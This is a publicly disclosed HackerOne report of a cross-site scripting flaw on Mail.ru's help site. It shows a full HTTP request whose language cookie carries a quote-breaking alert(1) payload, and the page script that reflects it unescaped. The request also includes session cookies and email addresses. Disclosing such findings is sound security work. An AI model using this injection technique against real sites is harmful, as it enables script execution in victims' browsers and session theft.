ReportLink:https://hackerone.com/reports/41939
WeaknessName:Cross-site Scripting (XSS) - Generic
Reporter:https://hackerone.com/isox
ReportedTo:Mail.ru(mailru)
BountyAmount:
Severity:
State:Closed
DateOfDisclosure:13.09.2015 12:10:33

Summary:

GET /surveys/2auth?fb.screen_resolution=2560x1440&fb.referrer=%0d&fb.token=65a544e694a77ff989b5effd51d67142&fb.question.2307=isox@inbox.ru&fb.question.2308=%d0%b4%d0%b0%2c+%d0%bd%d0%b0+iOS&fb.question.2309=%d0%b4%d0%b0%2c+%d0%bd%d0%b0+Mac+OS+X&fb.question.2310=%d0%b4%d0%b0%2c+%d0%bd%d0%b0+iOS&fb.question.2311=%d0%b4%d0%b0%2c+%d0%bd%d0%b0+iOS&fb.question.2312=%d0%b4%d0%b0%2c+%d0%bd%d0%b0+iOS&fb.message=%0d&fb.user_name=%d0%9a%d0%b8%d1%80%d0%b8%d0%bb%d0%bb&fb.communication_email=isox@qiwi.com&captcha_answer=x46p5x HTTP/1.1
Host: help.mail.ru
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://help.mail.ru/surveys/2auth
Cookie: mrcu=6D9254354D815F74F8E083148E4F; p=aREAAM+1lAAA; VID=25lbI608641I:; Mpop=1418228792:7c446677540e755b19050219081d000c1c0c054f6a5d5e465e030307071d01017518584a564010595f555a4f1b4341:isox@inbox.ru:; t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAABAAAID0QcA; i=AQDibIhUBgATAAgQBQkBAdwEAgAGAakHAZMpAV0ABQIBAKgACAcCBQABvgABqgAIBwIFAAG+AAHJAAUCAQBfAggWB0oAAUwAAU4AAWQAAWYAAXIAAXQAAQ==; b=HUADAIDhjwQA/EhRA0nYySBGSCOgAAAAQbVtGxAkxM8N2S/iFAIA; s=fver=15|dpr=1; _ga=GA1.2.1044800337.1413873207; lang=ru; lang_set=1; swa_lang=ru93efb'-alert(1)-'cd8b5909166; _showsc_isox@inbox.ru=1; c=6HGIVAAAAJ6MNQARAAQALAABAAIA; urxvt=a84549b0ff1e2720b3d7c69263a86294
Connection: keep-alive



<script>
	var lang=''; // language from profile
	var cookie_lang_set=parseInt('1'); // is language cookie set?
	var cookie_lang='ru'; // language cookie value
	var cookie_swa_lang='ru93efb'-alert(1)-'cd8b5909166'; // old language cookie value